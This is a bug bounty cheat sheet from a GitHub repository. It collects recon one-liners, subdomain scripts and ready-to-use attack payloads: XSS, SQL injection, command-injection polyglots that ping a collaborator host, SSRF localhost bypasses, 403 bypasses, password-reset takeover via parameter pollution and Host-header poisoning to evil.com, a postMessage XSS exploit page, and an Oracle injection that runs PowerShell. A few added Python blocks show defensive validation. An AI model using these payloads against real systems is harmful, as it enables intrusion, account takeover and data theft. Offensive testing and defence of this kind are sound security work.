Project
https://github.com/punishell/bbtips
Bug bounty tips
#bugbountytips
A collection from Twitter and my own bash-jutsu.
Recon
Google the company copyright footer to get more domains.
Use whoxy.com to perform reverse whois lookups with the email used to register the main domain.
Search for slides, docs, demos and video tutorials by your target. Many innocent examples could leak juicy endpoints.
Use OpenSSL to get certificates. They can contain valuable info and common names for finding more subdomains.
Try to recreate data from deleted accounts by signing up with the old email address.
Check the text version of HTML e-mails for template injections.
When testing Rails applications add .json to URL endpoints.
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
curl -s http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/
Subdomain enumeration
```bash
#!/bin/bash
# $1 => root domain
sublist3r -d $1 -o $1.txt
mkdir -p thirdlevel
echo "Gathering full third-level domains with sublist3r"
for domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u >> final.txt; done
echo "Probing for alive third-levels..."
cat final.txt | httprobe > probed.txt
```
Subdomain level extraction
Regex pattern | Domain level matched |
---|---|
grep -P '^(?:[a-z0-9-]+\.){1}[^.]*$' | second-level domains only |
grep -P '^(?:[a-z0-9-]+\.){2}[^.]*$' | third-level domains only |
grep -P '^(?:[a-z0-9-]+\.){2,}[^.]*$' | third-level domains or higher |
grep -P '^(?:[a-z0-9-]+\.){2,3}[^.]*$' | third- to fourth-level domains only |
grep -P '^(?:[a-z0-9-]+\.){3,}[^.]*$' | fourth-level domains or higher |
Check live hosts (from a greppable nmap file)
cat GREPABLENMAP.gnmap | grep 443/open | cut -d "(" -f 1 | cut -d : -f 2| tr -d " " | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew
Check live webapps from sublist3r output
cat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew
Filter ffuf output
cat * | jq | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl" | grep -v "FUZZ" | cut -d \" -f4
Tools
Use exiftool to extract metadata from documents; it might reveal vulnerable html-to-pdf generators.
Use cloud_enum to find open Google buckets or Azure accounts.
Use grep to extract endpoints: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+'
Use the Wayback Machine combined with paraminer or parameth.
Passive parameter mining: https://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey
Payloads
Inject payloads in parameter names: ?<script>alerty</script>=true
Use YouTube (OLX, etc.) videos with XSS in their names.
Use round brackets to inject a payload into a valid e-mail address.
X-Forwarded-For: ${payload}
Use long string parameters to trigger stack traces.
WAF bypass: ?page=";confirm`1`// -> 302; ?pag%65=";confirm`1`// -> 200 + XSS!
Redirect bypass: %26next=http://example.com
When testing a Node.js site add %ff at the end of the URL (https://target.com/%ff); most of the time it causes an error and returns a stack trace with the full path.
Add [] to the name of the parameter: pwd= -> pwd[]=
When interacting with a DB try to put % in the parameter: ?item=%
Authentication and authorization
UUID IDOR trick: register a user with the same name; the response may return the UUID.
Try to brute-force the login endpoint: /login/${oauth_provider}, e.g. login/facebook, login/oauth/twitter, login/oauth/v2/yahoo
403 Forbidden bypass: https://host.com/path = 403, https://host.com/%2e/path = 200
Bypass paywalls by using the Googlebot user agent.
Use securitytrails.com to find the originating server IP.
Do match and replace from false to true.
Set your birthday to today or tomorrow to get discounts.
Skip steps: /step/shipping -> ~~/step/payment~~ -> /step/confirm
Check whether Black Friday coupon codes expire.
Use blind XSS as the password.
Log in to the site using Facebook and try to change the userid during POST requests.
/api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200
Email restriction bypass
inti(;inti@inti.io;)@whitelisted.com
→ inti(;
→ inti@inti.io → my inbox!
→ ;)@whitelisted.com
- inti@inti.io(@whitelisted.com)
- inti+(@whitelisted.com;)@inti.io
Email address input fuzzing
test+(<script>alert(1)</script>)@example.com
test@example(<script>alert(1)</script>).com
"<script>alert(1)</script>"@example.com
"<%=7*7%>"@example.com
test+(${{7*7}})@example.com
"'OR 1=1--"@example.com
"mail');DROP TABLE users;--"@example.com
test@example.burpcollaborator.net
test@[127.0.0.1]
victim&email=attacker@example.com
"%0d%0aContent-Lenght:%200@0d%0a%0d%0a"@example.com"recipient@test.com>\r\nRCPT TO:<victim+"@test.com
Account takeover via email
GET /passwordreset
Double parameter (aka. HPP / HTTP parameter pollution):
email=victim@xyz.tld&email=hacker@xyz.tld
Carbon copy:
email=victim@xyz.tld%0a%0dcc:hacker@xyz.tld
Using separators:
email=victim@xyz.tld,hacker@xyz.tld
email=victim@xyz.tld%20hacker@xyz.tld
email=victim@xyz.tld|hacker@xyz.tld
No domain:
email=victim
No TLD (Top Level Domain):
email=victim@xyz
JSON array:
{"email":["victim@xyz.tld","hacker@xyz.tld"]}
Password reset:
reset user password: user@email.com.burpcollaborator.com
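As an added defensive example (not code from the bbtips repo), the Python below contrasts the suffix-only allowlist check that the RFC 5322 comment trick in "Email restriction bypass" defeats with a strict single-address validator, and applies the same rule to the reset-email inputs listed above (duplicated parameter, cc: injection, separators, missing domain/TLD, JSON array). The function names and the allowlisted domain are assumptions.

```python
import json
import re
from urllib.parse import parse_qsl

# Added example, not the repo's code. Strict address shape: unquoted local part,
# no "(comment)" groups, exactly one "@", dotted domain ending in a TLD.
STRICT_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}")


def naive_allowlisted(email: str, domain: str) -> bool:
    """The weak check: a suffix test on the raw string. It accepts
    inti(;inti@inti.io;)@whitelisted.com although mail is delivered to inti@inti.io."""
    return email.lower().endswith("@" + domain.lower())


def strict_allowlisted(email: str, domain: str) -> bool:
    """Validate the whole address first, then compare the domain exactly."""
    if not STRICT_EMAIL.fullmatch(email):
        return False
    return email.lower().rsplit("@", 1)[1] == domain.lower()


def reset_email_from_query(query: str):
    """Password-reset input from a query string: refuse HPP (two email= params),
    CRLF/cc: injection, ',' ' ' '|' separators, and addresses without a domain
    or TLD. Returns the single validated address or None."""
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == "email"]
    if len(values) != 1 or not STRICT_EMAIL.fullmatch(values[0]):
        return None
    return values[0]


def reset_email_from_json(body: str):
    """Same rule for JSON bodies: the value must be one string, never an array."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    email = data.get("email") if isinstance(data, dict) else None
    if not isinstance(email, str) or not STRICT_EMAIL.fullmatch(email):
        return None
    return email
```

The strict shape also refuses the quoted local parts from the fuzzing list above, which is what lets SQL fragments pass a lenient "valid e-mail" check.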
Find GET parameters on example.com
assetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
Command injection polyglots
/*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'"||ping -c 2 example.com||"/*`*/
/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1``*/-echo 1 >/tmp/rce1-'/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1` #*/-echo 1 >/tmp/rce1||'"||echo 1 >/tmp/rce1||"/*`*/
|echo lol2137||a #' |echo lol2137||a #|" |echo lol2137||a #
||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\" |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net
||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\" |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net
$(sleep 21)
SSRF bypass list for localhost (127.0.0.1):
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
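An added defensive example (not code from the bbtips repo): every entry in the list above is a different spelling of the same loopback or unspecified address, so an SSRF filter has to canonicalise the host literal to an IP object before comparing it. The function names are assumptions; hostnames are not resolved here, so a real filter must resolve them and re-run the check on the resolved address.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example, not the repo's code.


def host_to_ip(host: str):
    """Return an IPv4Address/IPv6Address for any literal form, or None for names."""
    h = host.strip("[]")
    try:
        return ipaddress.ip_address(h)          # 127.0.0.1, ::1, ::, 0000::1
    except ValueError:
        pass
    try:
        # inet_aton (glibc/BSD rules) accepts the legacy forms from the list:
        # "127.1", decimal "2130706433", hex "0x7f000001", octal "017700000001"
        # and per-octet octal "0177.00.00.01".
        return ipaddress.ip_address(socket.inet_aton(h))
    except OSError:
        return None                              # a hostname: resolve it, then re-check


def is_internal_url(url: str) -> bool:
    """True when the URL's host literal is loopback, unspecified, link-local or
    private. urlsplit().hostname already strips userinfo ("whitelisted@") and
    the port, so those tricks do not change the outcome."""
    host = urlsplit(url).hostname
    if not host:
        return False
    ip = host_to_ip(host)
    if ip is None:
        return False
    return ip.is_loopback or ip.is_unspecified or ip.is_link_local or ip.is_private
```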
Top 25 SSRF parameters
?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
Top 25 RCE parameters
?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
Top 25 LFI parameters
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
HackerOne redirect parameters
/[redirect]
?targetOrigin=[redirect]
?fallback=[redirect]
?query=[redirect]
?redirection_url=[redirect]
?next=[redirect]
?ref_url=[redirect]
?state=[redirect]
?l=[redirect]
?redirect_uri=[redirect]
?forum_reg=[redirect]
?return_to=[redirect]
?redirect_url=[redirect]
?return_url=[redirect]
?host=[redirect]
?url=[redirect]
?redirectto=[redirect]
?return=[redirect]
?prejoin_data=[redirect]
?callback_url=[redirect]
?path=[redirect]
?authorize_callback=[redirect]
?email=[redirect]
?origin=[redirect]
?continue=[redirect]
?domain_name=[redirect]
?redir=[redirect]
?wp_http_referer=[redirect]
?endpoint=[redirect]
?shop=[redirect]
?qpt_question_url=[redirect]
?checkout_url=[redirect]
?redirect_to=[redirect]
?succUrl=[redirect]
?file=[redirect]
?link=[redirect]
?referrer=[redirect]
?recipient=[redirect]
?redirect=[redirect]
?u=[redirect]
?hostname=[redirect]
?returnTo=[redirect]
?return_path=[redirect]
?image=[redirect]
?requestTokenAndRedirect=[redirect]
?retURL=[redirect]
?next_url=[redirect]
More parameters
Mass XSS
```bash
#!/bin/bash
# $1 => example.domain
subfinder -d $1 -o domains_subfinder_$1
amass enum --passive -d $1 -o domains_$1
cat domains_subfinder_$1 | tee -a domains_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
cat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt
```
Mass top-parameter search
TBA
echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
Juicy Google dorks
site:example.com inurl:.cgi?
File uploads: what to look for
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV injection
XML: XXE
AVI: LFI / SSRF
HTML / JS : HTML injection / XSS / Open redirect
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
File upload chains
../../../tmp/lol.png -> for path traversal
sleep(10)-- -.jpg -> for SQL injection
<svg onload=alert(document.domain)>.jpg/png -> for XSS
; sleep 10; -> for command injection
Find JavaScript files on target.com
echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
or:
cat domains | httpx -silent | subjs | anew
Extract endpoints from *.js
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
Extract juicy data from JS
cat hosts | httpx -silent | subjs | anew | httpx -silent -sr -mc 200
grep -EHirn "accesskey|admin|aes|api_key|apikey|password|secret|token" ./output --color
403 bypass
https://target.com/admin/ -> HTTP 302 (redirect to login page)
https://target.com/admin..;/ -> HTTP 200 OK
https://target.com/../admin
https://target.com/whatever/..;/admin
site.com/secret -> HTTP 403 Forbidden
site.com/secret/ -> HTTP 200 OK
site.com/secret/. -> HTTP 200 OK
site.com//secret// -> HTTP 200 OK
site.com/./secret/.. -> HTTP 200 OK
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
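An added defensive example (not code from the bbtips repo): the variants above work when a front-end rule compares the raw request target against "/admin" while the backend normalises the path first. Canonicalising before the authorisation decision makes them compare equal. The function names are assumptions; the X-Original-URL / X-Rewrite-URL overrides are a separate fix (strip those headers at the edge).

```python
import posixpath
from urllib.parse import unquote

# Added example, not the repo's code.


def canonical_path(raw_target: str) -> str:
    """Decode and normalise a request target the way a backend would, so that a
    prefix rule sees the resource that will actually be served."""
    p = raw_target.split("?", 1)[0].split("#", 1)[0]   # drop query and fragment
    # Decoding twice over-decodes, which for an authorisation check is the
    # fail-closed direction: /%2e/ and /%252e/ both become /./
    p = unquote(unquote(p))
    # Drop per-segment path parameters (";jsessionid=..."), which Tomcat-style
    # servers ignore; "/..;/" therefore becomes "/../" and "/.;/" becomes "/./"
    p = "/".join(seg.split(";", 1)[0] for seg in p.split("/"))
    while "//" in p:            # posixpath.normpath preserves a leading "//"
        p = p.replace("//", "/")
    p = posixpath.normpath(p)   # collapses /./, /../, trailing "/." and "/"
    return p if p.startswith("/") else "/" + p


def naive_is_admin(raw_target: str) -> bool:
    """Prefix test on the raw string: misses most variants in the list above."""
    return raw_target.startswith("/admin")


def canonical_is_admin(raw_target: str) -> bool:
    c = canonical_path(raw_target)
    return c == "/admin" or c.startswith("/admin/")
```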
Leaking data via .json
Here's a tip for leaking sensitive data by appending the .json extension.
Request:
GET /ResetPassword HTTP/1.1
{"email":"victim@example.com"}
Response:
HTTP/1.1 200 OK
Now let’s try this instead:
Request:
GET /ResetPassword.json HTTP/1.1
{"email":"victim@example.com"}
Response:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
Generate a wordlist for the target
echo "bugcrowd.com" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:&#]/\\n/g' | anew
Check for SQLi
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
SQLi in the email parameter
Payload | Response | Injection status |
---|---|---|
{"email":"asd@a.com"} | {"code":2002,"status":200,"message":"Email not found."} | Valid |
{"email":"asd a@a.com"} | {"code":2002,"status":200,"message":"Bad format"} | Not valid |
{"email":"\"asd a\"@a.com"} | {"code":2002,"status":200,"message":"Bad format"} | Not valid |
{"email":"asd(a)@a.com"} | {"code":2002,"status":200,"message":"Bad format"} | Not valid |
{"email":"\"asd(a)\"@a.com"} | {"code":2002,"status":200,"message":"Email not found."} | Valid |
{"email":"asd'a@a.com"} | {"code":0,"status":500,"message":"Unspecified error"} | Not valid |
{"email":"asd'or'1'='1@a.com"} | {"code":2002,"status":200,"message":"Email not found."} | Valid |
{"email":"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1@a.com"} | {"code":2002,"status":200,"message":"Bad format"} | Not valid |
{"email":"\"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1\"@a.com"} | {"code":0,"status":200,"message":"Successful"} | Valid, delay: 7,854 ms |
{"email":"\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\"@a.com"} | {"code":0,"status":200,"message":"Successful"} | Valid, delay: 8,696 ms |
{"email":"\"a'-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\"@a.com"} | {"code":0,"status":200,"message":"Successful"} | Valid, no delay |
Oracle
1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) >71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual --
1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c type C:\\users\\public\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=>''myjob11'',program_name=>''exec4'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''exec4'');dbms_scheduler.purge_log;'), null FROM DUAL --
1' AND 1=1 UNION SELECT null, user FROM DUAL --
Cool Burp plugins
Autorize – To test BACs (Broken Access Control)
Burp Bounty – Profile-based scanner
Active Scan++ – Add more power to Burp’s Active Scanner
AuthMatrix – Authorization/PrivEsc checks
Broken Link Hijacking – For BLH (Broken Link Hijacking)
Collaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery)
Command Injection Attacker
Content-Type Converter – Trying to bypass certain restrictions by changing Content-Type
Decoder Improved – More decoder features
Freddy – Deserialization
Flow – Better HTTP history
Hackvertor – Handy type conversion
HTTP Request Smuggler
Hunt – Potential vuln identifier
InQL – GraphQL Introspection testing
J2EE Scan – Scanning J2EE apps
JSON/JS Beautifier
JSON Web Token Attacker
ParamMiner – Mine hidden parameters
Reflected File Download Checker
Reflected Parameter – Potential reflection
SAML Raider – SAML testing
Upload Scanner – File upload tester
Web Cache Deception Scanner
Detect frameworks via favicon
cat urls.txt | python3 favfreak.py -o output
Password reset poisoning
(1) Normal request:
Request:
POST /password-reset?user=123 HTTP/1.1
Host: target.com
Link received:
https://target.com/reset-link=1g2f3guy23g
(2) Basic HHI (Host Header Injection):
Request:
POST /password-reset?user=123 HTTP/1.1
Host: evil.com
Link received:
none
Error 404 - request blocked
(3) Bypass technique:
Request:
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com
Link received:
https://evil.com/reset-link=1g2f3guy23g
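An added defensive example (not code from the bbtips repo) modelling the three cases above: the vulnerable handler checks the allowlist against the authority in an absolute-form request line but builds the link from the Host header, which is why case (2) is blocked and case (3) is not; the safe handler validates Host and builds the link from a configured base URL only. ALLOWED_HOSTS, CANONICAL_BASE and the function names are assumptions.

```python
from urllib.parse import urlsplit

# Added example, not the repo's code. Allowlist and base URL are constructed.
ALLOWED_HOSTS = {"target.com", "www.target.com"}
CANONICAL_BASE = "https://target.com"


def vulnerable_reset_link(request_target: str, host_header: str, token: str):
    """The pattern behind cases (1)-(3): when the request line is absolute-form
    ("POST https://target.com/... HTTP/1.1") its authority is what gets checked,
    but the link is still built from the client-controlled Host header."""
    checked = host_header
    if request_target.startswith(("http://", "https://")):
        checked = urlsplit(request_target).hostname or ""
    if checked.split(":", 1)[0].lower() not in ALLOWED_HOSTS:
        return None                         # "Error 404 - request blocked"
    return "https://%s/reset-link=%s" % (host_header, token)


def safe_reset_link(request_target: str, host_header: str, token: str):
    """Check the Host header itself (ignoring any request-line authority) and
    never echo a client-supplied host: the link comes from CANONICAL_BASE."""
    if host_header.split(":", 1)[0].lower() not in ALLOWED_HOSTS:
        return None
    return "%s/reset-link=%s" % (CANONICAL_BASE, token)
```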
Find hostnames for a given IP
echo 192.168.69.69 | cero
XSS via postMessage PoC
Vulnerable postMessage handler:
```html
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script>
// No event.origin check, and the untrusted message is handed straight to
// jQuery, which parses it as HTML.
window.addEventListener("message", (event) => {
console.log(event.data);
$(event.data)
}, false);
</script>
```
Exploit:
```html
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<script>
var myWindow = window.open("http://example.com/test.html")
</script>
<script>
setInterval(function(){myWindow.postMessage("<img src=x onerror=alert(123);>","*");},3000);
window.onmessage = function (e) {
console.log(e);
};
</script>
</body>
</html>
```
Deserialization
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://github.com/tyranid/ExploitRemotingService
https://github.com/nccgroup/VulnerableDotNetHTTPRemoting
https://github.com/pwntester/ysoserial.net/blob/master/README.md
https://nickbloor.co.uk/2018/02/28/popping-wordpress/
From path traversal to source code in ASP.NET MVC applications
https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html
Exploiting Deserialisation in ASP.NET via ViewState
http://bit.ly/2NDZc73
Hacking IIS
https://www.youtube.com/watch?v=HrJW6Y9kHC4
Get endpoints from web-archive
cat hosts.live | gau -b ttf,woff,svg,png,jpg,gif,css,jpeg,pdf,zip,gz | tee -a hosts.gau
CLI hacking cheat sheet
Get JS from live hosts
```bash
cat hosts.httprobe | getJS --complete | tee -a hosts.httprobe.js
cat hosts.httprobe | gau | tee -a hosts.httprobe.gau
cat hosts.httprobe.gau |grep -iE '\.js'|grep -ivE '\.json'|sort -u >> hosts.httprobe.js # cat hosts.httprobe.gau | unfurl format %s://%d%p |grep -iE '\.js'|grep -ivE '\.json'|sort -u
cat hosts.httprobe.js | sort -u >> hosts.httprobe.js.sorted
cat hosts.httprobe.js.sorted|cut -d \? -f1 | sort -u | httpx -mc 200 | tee -a hosts.httprobe.js.sorted.200
cat hosts.httprobe.js.sorted.200 | httpx -silent -sr -mc 200
```
Search for reflected XSS
```bash
cat hosts.httprobe | gau | tee -a hosts.httprobe.gau
cat hosts.httprobe.gau | unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl
cat hosts.httprobe.gau.unfurl | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.200
cat hosts.httprobe.gau.unfurl.200 | dalfox pipe -o hosts.httprobe | tee -a hosts.httprobe.gau.unfurl.200.dalfox
```
Get endpoints with potentially exploitable parameters
```bash
cat hosts.httprobe | cut -d / -f 3 |gau -b css,png,jpeg,jpg,svg,gif,wolf,pdf,txt,ptt,gz,zip,csv | tee -a hosts.httprobe.gau
cat hosts.httprobe.gau | grep -E 'asp|aspx|cgi|jsp|php|sql'| unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl.ext
for i in `cat hosts.httprobe.gau.unfurl.ext`; do grep $i hosts.httprobe.gau | grep \? | head -n1 | tee -a hosts.httprobe.gau.unfurl.ext.filtred ; done
cat hosts.httprobe.gau.unfurl.ext.filtred | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.ext.filtred.200
```
Brute-force juicy endpoints
```bash
for i in `cat hosts.httprobe.filtred `; do ffuf -w /payloads/free-kill.txt -u $i/FUZZ -of json -o qh-output/`echo $i | cut -d / -f3` -mc 200 -fl 1 -ac ; done
for i in `ls qh-output/`; do cat qh-output/$i | python -m json.tool | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl" | grep -v "FUZZ" | cut -d \" -f4 >> qh-urls.txt;done
```
Miscellaneous
https://regex-generator.olafneumann.org/
https://regex101.com/
References